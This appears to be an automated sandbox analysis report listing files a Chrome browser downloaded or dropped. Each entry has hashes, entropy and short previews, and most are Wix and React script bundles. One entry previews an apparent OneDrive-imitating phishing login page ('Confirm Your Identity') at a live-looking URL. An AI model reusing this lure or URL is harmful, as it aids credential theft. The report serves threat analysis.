                                                                                                                                                                                                                        SHA-512:3574237335B1C713467E343A10EEF2CC093A447E5179BBCFEC16708F377F870E1A0EAE3BDD730D34D731ABAB8728C804BF6BB5B7909C0CA10F52672719DB8DE3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://siteassets.parastorage.com/pages/pages/thunderbolt?beckyExperiments=.DatePickerPortal%2C.LoginBarEnableLoggingInStateInSSR%2C.TextInputAutoFillFix%2C.WRichTextVerticalTextNowidth%2C.WixFreeSiteBannerMobile%2C.buttonUdp%2C.fetchBlocksDevCenterWidgetIds%2C.fiveGridLineStudioSkins%2C.fixRatingsInputLeftShift%2C.imageEncodingAVIF%2C.inflateRepeaterItemsInRender%2C.minMaxInCheckboxGroup%2C.motionFeature%2C.prefetchPageResourcesVeloApi%2C.removeAllStatesBlocksFix%2C.removeHeaderFooterWrappers%2C.shouldUseResponsiveImages%2C.updateRichTextSemanticClassNamesOnCorvid%2C.useInternalBlocksRefType%2C.useSvgLoaderFeature&blocksBuilderManifestGeneratorVersion=1.129.0&contentType=application%2Fjson&deviceType=Desktop&dfCk=6&dfVersion=1.4246.0&disableStaticPagesUrlHierarchy=false&editorName=Unknown&experiments=dm_bgScrubToMotionFixer%2Cdm_deleteLayoutOverridesForRefComponents%2Cdm_removeTpaChildren%2Cspecs.thunderbolt.use_data_fixed_pages_upstream&externalBaseUrl=https%3A%2F%2Fwww.samantacatering.com&fileId=b5f4a1df.bundle.min&formFactor=desktop&hasTPAWorkerOnSite=false&isHttps=true&isInSeo=false&isMultilingualEnabled=false&isPremiumDomain=true&isTrackClicksAnalyticsEnabled=false&isUrlMigrated=true&isWixCodeOnPage=false&isWixCodeOnSite=false&language=en&languageResolutionMethod=QueryParam&metaSiteId=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&module=thunderbolt-features&oneDocEnabled=true&originalLanguage=en&pageId=0158b4_e8786293acb663f652def8dbfaf20817_11.json&quickActionsMenuEnabled=false&registryLibrariesTopology=%5B%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22wixui%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%2C%7B%22artifactId%22%3A%22editor-elements%22%2C%22namespace%22%3A%22dsgnsys%22%2C%22url%22%3A%22https%3A%2F%2Fstatic.parastorage.com%2Fservices%2Feditor-elements%2F1.13190.0%22%7D%5D&remoteWidgetStructureBuilderVersion=1.251.0&siteId=cd5327d5-636b-4778-a97d-3945688a9fde&siteRevision=11&staticHTMLComponentUrl=https%3A%2F%2Fwww-samantacatering-com.filesusr.com%2F&useSandboxInHTMLComp=false&viewMode=desktop
                                                                                                                                                                                                                        Preview:{"stateRefs":{"comp-m4qt7eq81":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7ert":{"reportBi":{"$type":"ref","refPath":["exports","businessLogger","reportBi"]}},"comp-m4qt7esk1":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7eta":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7ete":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7etl":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7eqp":{"reportBi":{"$type":"ref","refPath":["exports","businessLogger","reportBi"]}},"comp-m4qt7er6":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7erd":{"reportBi":{"$type":"ref","refPath":["exports","businessLogger","reportBi"]}},"comp-m4qt7erj":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qt7er
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (35078)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35199
                                                                                                                                                                                                                        Entropy (8bit):5.3349250548648035
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:bf1ZuXe09MquPjPk3VtABFWDmDYMcqntg7s4zxwoDG:bf7u8PjPu/qWG
                                                                                                                                                                                                                        MD5:0791809290EEE3CB00A08A33E5AE90F3
                                                                                                                                                                                                                        SHA1:E266713144BB39FAF4865B51962C0FCBC98B8B74
                                                                                                                                                                                                                        SHA-256:0AB6FEBE161F23BD6CC9C1F23B5C08AD7F69F2FE0B849CA7BF746863B92CD0BD
                                                                                                                                                                                                                        SHA-512:8666A98BB6497C4C4ED12601F3F7A94CCD8A294C8FE057F92521B4CB5323DA4CE6D5A30AFB4CB81697430C30FCD6230228B28BC042546151A3BC5FD0E82F2A70
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4655],{95667:function(e){var t;"undefined"!=typeof self&&self,t=()=>(()=>{var e={724:function(e,t,n){var r;e.exports=(r=r||function(e,t){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(56)}catch(e){}var o=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(e){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(e){}}throw new Error("Native crypto module could not be used to get secure random number.")},i=Object.create||function(){function e(){}return function(t){var n;return e.prototype=t,n=new e,e.prototype=null,n}}(),a={},c=a.lib={
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 82 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8040
                                                                                                                                                                                                                        Entropy (8bit):7.9699916849012125
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:sKB6ZnztJYtApPRVn53tNi0+AOBRZ+zOA:sKSnzPYtApPn5Pie8+p
                                                                                                                                                                                                                        MD5:3A96EFB1B5667B98AE54316443DAF59E
                                                                                                                                                                                                                        SHA1:ED2AE708606CFF6D4F43E9B2ACF96B5043C6BD49
                                                                                                                                                                                                                        SHA-256:5CADBDBE71976F9C62FCD0B98A334A95925C66360687E269538C4A74DD28A13A
                                                                                                                                                                                                                        SHA-512:A963C30EBA0704D23EDABF5BF9871D699D42B86AD9BBB9646C85DFF45D448E3F939416FF38564404729B334DF2357D3046FB4D897232E489029BC75FB9F037DF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:.PNG........IHDR...R...e......S......sRGB........"IDATx^.y.\U...g.[m.&.D.$d#.$.%@L.2.. ..E.| ....2.0,..8......p.D.a..0....O.!.$l.B.B....k..9g...j`....I5.G..t.Su.......=.m..GK....ed'..."#..9..E.Z.......".-..E..l....f."G@..@.v3b.# [D.E.y.Z........Y.(.i.9..n.S o.m..W_...K/.q.m..N..;.....{..y...(w..,.........;..x..b.3[.J....@.:.."R..L..7..R.0w....?|.EK'..}8..~.O.r...}.../....Bq.....`..D.0...<...#4.. ...l/a..+/.P..........ok..v....~..Bk}%8^.J3p7..zH.`...\(.T..\.q.c...]t.....1k..t.k...qg.:Hc...-[.Xs.o..mWe..%..;...hH.../.H.X..r..#........}.,..h..a..~u..>v.l.g..Z....r...'?....v.,.....r..Q=P........<.p....2K..5.u.^.RBC!R....X.v/1G.p..9.;....%.....r....=..kp...._..-.a....5.. ..D..!...I...*...Z"..i..p....1r...Q...p..FU.S....<i.yG..h..>o6. .7.-.o....}'$!..m.x.w'.Z....vX....K%pI`$..Cs....9p...N.]..:0F..A...R..y.<A*b...W......<f..sO..v.3.?..a.....e.<..K:fs...?.......M..F...-]H..B.......%4g`n.....:.\J.!,P-..&".#8.7.....N.bt 0w..U]...-cL....|rM4c..[.S...
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4373)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4490
                                                                                                                                                                                                                        Entropy (8bit):5.324674926401483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:z/Zf2ZTh/sfKwCkHosYbGlG1ldJ3Pi/nY6szZqAwcRUcRwvM:zY/7kI7SlGpJ3qxs5w0
                                                                                                                                                                                                                        MD5:444F7A86B5AD059A20281C7562749F99
                                                                                                                                                                                                                        SHA1:6AD617D35AABCF8A2FE6E3B09DB3575C0A212F9F
                                                                                                                                                                                                                        SHA-256:77F04D91D032BA8F4F45EACC916BCBE3D3CBC748EB3567EFE5226686D0355512
                                                                                                                                                                                                                        SHA-512:B685A8E35D75C5EEDABEB1A06E5E0DADE6537879CC07748597877C935266BF650D81BF207F992FA3FF543447D7AEF18DF4601F31CC20368A0CB0B64585F36672
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8908],{13396:(e,t,n)=>{n.r(t),n.d(t,{PageTransitionsSymbol:()=>r.e$,editor:()=>v,editorPage:()=>h,page:()=>_});var o=n(77748),i=n(20590),s=n(39218),a=n(32166),r=n(86046),d=n(41596);const l=(0,o.Og)([(0,o.KT)(i.Gp,r.UU),(0,o.KT)(i.wk,r.UU),s.dB,d.s,a.RV],((e,t,n,o,i)=>{const s=!!i&&"startViewTransition"in i.document&&e.shouldUseViewTransition;return{name:"pageTransitions",pageDidMount(o){const i=t.get(),s=i?.mountDoneHandler;s&&s({transitionName:e.transitionName,pageId:o}),(i?.isFirstMount??1)&&n.notifyPageTransitionsCompleted(o),t.update((e=>({...e,isFirstMount:!1})))},pageWillUnmount({contextId:e}){const a=t.get();if(s){const e=()=>{o.getScrollYHistoryState()||o.scrollToTop()},s=e=>{n.notifyPageTransitionsCompleted(e),o.getScrollYHistoryState()&&o.restoreScrollPosition()};!function(e,t,n,o){let i,s;t.document.documentElement.dataset.viewTransition="page-transition";const a=document.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):3784
                                                                                                                                                                                                                        Entropy (8bit):3.846100445814444
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:lPRCulPt4QwpDtpg1I+wB8oCjLLOH3QnZOWPoYnvgkLOfgqUkUHTNfpXqgRqOxpT:BFh9EDtpOwOoYLwQgAYYHXq8ZRgK
                                                                                                                                                                                                                        MD5:52691A7D143719ECA19E82551DC4C68E
                                                                                                                                                                                                                        SHA1:813D6910B5417998B111092526423B5280551AFE
                                                                                                                                                                                                                        SHA-256:DF39BC1D93AC453AD840AD1253FD299018C8156FAECF539427BF476DF2414B76
                                                                                                                                                                                                                        SHA-512:DB549A8F496ED49E0719ED2AAA51E477AF5EAE89977F02B773941DCE2963C21102894DBBDBE1B890362A764D06BCD8215E730CBB01CC87C80F2B2F9E438EE593
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440
                                                                                                                                                                                                                        Preview:....<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>One Drive - Login</title>.. <link rel="stylesheet" href="../css/main.css">.. <style>.. .. </style>..</head>..<body>.... <div class="container">.. <div class="headbox"></div>.... <div class="containerBox">.. <div class="logBox"></div> logo box without img -->.... <div class="mainContainer">.... <div class="conBox">.. <h1>Confirm Your Identity</h1>.. </div>.... <div class="conBox2">.. <div class="textConp">.. <p>You have received a secure link</p>.. </div>.... <div class="pfBox">.. <div class="pfImg"></div> PDF icon box without img -->.... <div class="pfText">..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32056)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):32172
                                                                                                                                                                                                                        Entropy (8bit):5.387855792611775
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:HO3dCAQ0KIKNHgLdiZy/JwYzhsslUTt92S0pjEDn6Ezfj3I9to1+QkeIrPuu8iNQ:18iZKzODn6EzMOi7caXi
                                                                                                                                                                                                                        MD5:A235F3EB11853B5304271883D16D1CCB
                                                                                                                                                                                                                        SHA1:087F4C13886FC026FFCB0D3CC0660888241900BD
                                                                                                                                                                                                                        SHA-256:A7E4E26553B4657E012CD42044659E71B77843E04CB06B28E4E698883C57A653
                                                                                                                                                                                                                        SHA-512:7EE425D7B69F31FBFBA2F6DAA02073C41F971FAC14E8F0A92AF6CA0F167B9415E5E055AD282EFAADFFB3B0835C6B58AD7D6DB3BB6B68F3B1CFD10FDC2EEF3E8C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3660],{53466:e=>{"use strict";e.exports=function(e,t,a){var r=e.split(t,a);if(r.length===a){var n=0;n="string"==typeof t?r.join(t).length:r.reduce((function(r,n,o){var s=0;return o+1<a&&(s=e.slice(r).match(t).shift().length),r+n.length+s}),0),r[a-1]+=e.slice(n)}return r}},36673:(e,t,a)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){e.onmessage=function(a){var n=a.data,o=(0,r.parseChannelMessage)(n),s=o.id,i={data:o.payload,origin:a.origin,lastEventId:a.lastEventId,source:a.source,ports:a.ports};t(i,(function(t){e.postMessage((0,r.constructChannelMessage)(t,s))}))}};var r=a(54497)},92313:(e,t,a)=>{"use strict";var r,n=a(69549),o=a(54497),s=a(36673),i=(r=s)&&r.__esModule?r:{default:r};var c=function(){};e.exports=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:c;if(!e||"string"!=typeof e)throw new Error("listener function expects to
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (2987)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):3110
                                                                                                                                                                                                                        Entropy (8bit):5.382838485137194
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:dKsTwGb/b0/osS/UkhouCFOqkZ/tEM/sJQk42VmMZK9LXlCqks8AEKWWk:8z6o/osMo9OqkjxH2VmMeXlC0ZWWk
                                                                                                                                                                                                                        MD5:753F644A5D82B7A814FC7A0744BDAF3A
                                                                                                                                                                                                                        SHA1:5D6FC114CD6DD267ED8DB745336F9A971AEC59FE
                                                                                                                                                                                                                        SHA-256:BBF1A0F65E5617B8FBB0AF3D510CD0E0819EEB0795A5D2C2AD35A020B2AD3584
                                                                                                                                                                                                                        SHA-512:547AF561CA4ACC5F5CB0A4178CD651CCE730E5CB867130BD3F233A66A9A0A930BCBD6C8767D89375D8600CA17F9CF1FB883369B8ECC1E88E0CF82B23FC4FCD0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/scrollToAnchor.03bceb39.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5652,6521,7116],{6395:(e,t,s)=>{s.d(t,{X:()=>u});const n=/^<([-A-Za-z0-9_?:]+)((?:\s+(?:x:)?[-A-Za-z0-9_]+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/,r=/^<\/([-A-Za-z0-9_?:]+)[^>]*>/,a=/((?:x:)?[-A-Za-z0-9_]+)(?:\s*=\s*(?:(?:"((?:\\.|[^"])*)")|(?:'((?:\\.|[^'])*)')|([^>\s]+)))?/g,l=h("area,base,basefont,br,col,frame,hr,img,input,isindex,link,meta,param,embed"),i=h("address,applet,blockquote,button,center,dd,del,dir,div,dl,dt,fieldset,form,frameset,hr,iframe,ins,isindex,li,map,menu,noframes,noscript,object,ol,p,pre,script,table,tbody,td,tfoot,th,thead,tr,ul"),o=h("a,abbr,acronym,applet,b,basefont,bdo,big,br,button,cite,code,del,dfn,em,font,i,iframe,img,input,ins,kbd,label,map,object,q,s,samp,script,select,small,span,strike,strong,sub,sup,textarea,tt,u,var"),c=h("colgroup,dd,dt,li,options,p,td,tfoot,th,thead,tr"),d=h("checked,compact,declare,defer,disabled,ismap,multip
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):66257
                                                                                                                                                                                                                        Entropy (8bit):5.448346154298007
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:k7hCp95VCe92nCIGArg6B1NN9GauHP4o+fCYunqum5RJoIx3tNclc8k+vo64T8Ym:WhBClArg6B1NN9GrUuN1Xu/uai6RIVLl
                                                                                                                                                                                                                        MD5:8433DFE4F0FD3AAFFBF78372EA84D466
                                                                                                                                                                                                                        SHA1:40FF8180DFC36C48EA8F14785BFCF573437601A2
                                                                                                                                                                                                                        SHA-256:0E18D298C74CF09795D8B953C952A9E63B3497A88FA60DC168E1056EAEC5ED72
                                                                                                                                                                                                                        SHA-512:11E499946BCDE208044FC52CCF1D3FB06987BC6D69FE6FB8F59B05A86BBA4668DF180198528970DE8EE53C95AA92D6A80BB4E53CE62D1CC75FEFDB5DDE798C96
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap.d49fc07e.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react"),require("react-dom")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_bootstrap",["react","reactDOM"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt_bootstrap"]=t(require("react"),require("react-dom")):e["rb_wixui.thunderbolt_bootstrap"]=t(e.React,e.ReactDOM)}("undefined"!=typeof self?self:this,(function(e,t){return function(){var n={27232:function(e,t,n){var a=n(82016);e.exports=a.create("StylableButton2545352419",{classes:{root:"StylableButton2545352419__root",label:"StylableButton2545352419__label",link:"StylableButton2545352419__link",container:"StylableButton2545352419__container",icon:"StylableButton2545352419__icon"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},82016:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.createRenderable=t.create=void 0;t.create=function(e,t,n,a,r,i){const o={namespace:e,classes:t.class
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):256611
                                                                                                                                                                                                                        Entropy (8bit):5.356229019788686
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:T8i5K3QBWm8V8QDOjQPM+TJNzk/EVKPuP7v3tI/P6LZufpZH4Bj5BJSNEbuTBAi1:T8i5Kbm8Vl4Qkel6Pu/s0Q
                                                                                                                                                                                                                        MD5:26D6313E82616D92F887AEFCDEB4C6DB
                                                                                                                                                                                                                        SHA1:69C2817B9659FBC23AE08CD6B8EDAC6FE51D18DB
                                                                                                                                                                                                                        SHA-256:C7FC74125FFE0DBD5A0736578B7714CA6DE0BE0EA9BF80605231B30C3AF585A8
                                                                                                                                                                                                                        SHA-512:6F000CFC8AAEFEC03A2AF3D675A8B85AB06C905848FCA01EAC355F10E67AFFECF65019CE100C6D90CBC474BD0C74B008CD650A8B0F68DAE6AF1D40F7FD717BB4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/main.5209da57.bundle.min.js
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4017,8792],{47795:(e,t,r)=>{"use strict";r.r(t),r.d(t,{ConsentPolicyAccessor:()=>f});var n,o={policy:"getCurrentConsentPolicy",header:"_getConsentPolicyHeader",isMethod:!0},i={policy:"consentPolicy",header:"consentPolicyHeader",isMethod:!1},a={essential:!0,dataToThirdParty:!0,advertising:!0,functional:!0,analytics:!0};function s(){return window}function c(){return self}function u(){return r.g}function l(){return globalThis}function d(e){var t;void 0===e&&(e=void 0),e&&(n=e),n||e||[l,u,c,s].forEach((function(e){try{n||(n=e())}catch(e){}}));try{"object"==typeof n.commonConfig&&n.commonConfig.consentPolicy&&(t=p(n.commonConfig,i)),t||"object"!=typeof n.consentPolicyManager||(t=p(n.consentPolicyManager,o)),t||"object"!=typeof n.Wix||"object"!=typeof n.Wix.Utils||"function"!=typeof n.Wix.Utils.getCurrentConsentPolicy||(t=p(n.Wix.Utils,o))}catch(e){}return t}function p(e,t){return{getCurrentConsentPoli
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12037)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12154
                                                                                                                                                                                                                        Entropy (8bit):5.301848236338458
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Jd4xuYUm9pEMKhbW0MGnGvAk/CCiST1keD4JOrd6qNelJxgnPxAvL0hDxABHyuAT:74oTmSMGGvvqX4TxYHyuAYMdQj7uiwRR
                                                                                                                                                                                                                        MD5:E76FBBECCAFF59FF1C2FE5FB515009F1
                                                                                                                                                                                                                        SHA1:58C4BB8F9B648DFE507D1CE76F5EBC581FC24E14
                                                                                                                                                                                                                        SHA-256:49569AD3A80B2FCA596606731F721673D9D5965D3516E5AE5877B9EC8D3A3842
                                                                                                                                                                                                                        SHA-512:ED8B40F67E5833B5498903CC67DCBB1AF753DA6DF38FD6333D35D9ADCEC0461925A13E29CB4E7ADB1937B35FF497DD7503995065FDC35E9A68A70258FA302C32
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4526],{24334:(e,t,r)=>{r.r(t),r.d(t,{ClassNameApiSymbol:()=>p._c,page:()=>_});var a=r(62155),n=r.n(a),o=r(77748),s=r(20590),i=r(66225),c=r(32166),g=r(39218),l=r(87711),d=r(35406),p=r(79904),m=r(789);const f=(e,t)=>{if(!e)return!1;const r=e;return r.id===t||!!r.parentNode&&f(r.parentNode,t)},u=(e,t)=>(t=t||window.innerWidth,!(e.min&&t<e.min)&&!(e.max&&t>e.max));var h=r(56656),v=r(49698),E=r(89301),T=r(59058);const b={addCompId:!0},y=(0,o.Og)([(0,o.KT)(s.Gp,p.UU),(0,o.KT)(s.wk,p.UU),(0,o.KT)(s.AF,p.UU),p.cZ,i.T,c.RV,g.Is,l.Ji,c.Ht,p.o2,p.LI,p.RB,p.P0,p._c,d.Q,p.LY,(0,o.lq)(g.dB),(0,o.lq)(E.J0),(0,o.lq)(T.h)],(({compsToTriggers:e,isTouchDevice:t,compIdsWithAccessibleTrigger:r,effectTriggerToReaction:a,dynamicCompToDescendants:o,isMotionEnabled:s},i,c,g,l,d,p,u,E,T,{isTriggerBpRangeInCurrentBreakpoint:y},R,{shouldEnableTriggersAndReactions:C},{addClassName:I},$,k,D,w,U)=>{let O;const S=(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):10751
                                                                                                                                                                                                                        Entropy (8bit):5.3269914599293475
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:kEovMTFJ8aTY0jDAyjjf8fDye7hjI6UpAe:JoeFvHcfDbhjI6G
                                                                                                                                                                                                                        MD5:E91B2616629791B375867C298DC846CC
                                                                                                                                                                                                                        SHA1:AA77AE4C49F525BC21DE1D04F08A5D73962C7CCE
                                                                                                                                                                                                                        SHA-256:D949F1C3687AEDADCEDAC85261865F29B17CD273997E7F6B2BFC53B2F9D4C4DD
                                                                                                                                                                                                                        SHA-512:415B3C2E8E3717D952B81CA469D0DBD284970CBFC16D9E7CF2EAD6542470488A1EC10BFF1308357FCE262B753BF746D9D057E115AD584905262211BEA4844A7A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/unpkg/react@18.3.1/umd/react.production.min.js
                                                                                                                                                                                                                        Preview:/**. * @license React. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=V&&a[V]||a["@@iterator"];return"function"===typeof a?a:null}function w(a,b,e){this.props=a;this.context=b;this.refs=W;this.updater=e||X}function Y(){}function K(a,b,e){this.props=a;this.context=b;this.refs=W;this.updater=e||X}function Z(a,b,.e){var m,d={},c=null,h=null;if(null!=b)for(m in void 0!==b.ref&&(h=b.ref),void 0!==b.key&&(c=""+b.key),b)aa.call(b,m)&&!ba.hasOwnProperty(m)&&(d[m]=b[m]);var l=arguments.length-2;if(1===l)d.children=e;else if(1<l){for(var f=Array(l),k=0;k<l;k++)f[k
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):4030
                                                                                                                                                                                                                        Entropy (8bit):5.0833228093741285
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:fzL2R2ZOpTKn77LvDluhXnWGXMVoss94lUS9vkA/P7VuJvYY8SLNBgwt7eVYDffr:fzL2R2ZOpTKn77LvZuhXnWGXeVs94lh2
                                                                                                                                                                                                                        MD5:0F364231C7BBBCBF4AF5F7BAFFF7EFF4
                                                                                                                                                                                                                        SHA1:D0D48034CCF010C6454BC4EC0A70F7912215AFA7
                                                                                                                                                                                                                        SHA-256:CDFB2520854BD9416B661293E7037D1FFAB7EE02984041E7E03692473A7187C5
                                                                                                                                                                                                                        SHA-512:DCDF7C1936CD0B493DAA40223184BF50C77A9CE1333B3EDC671336318F349A44E807CCBFC2EFBC3CC76330678A618088C4241492B6DD76AF4D9691CCF45F8A13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements/1.13190.0/rb_dsgnsys.thunderbolt.manifest.min.json
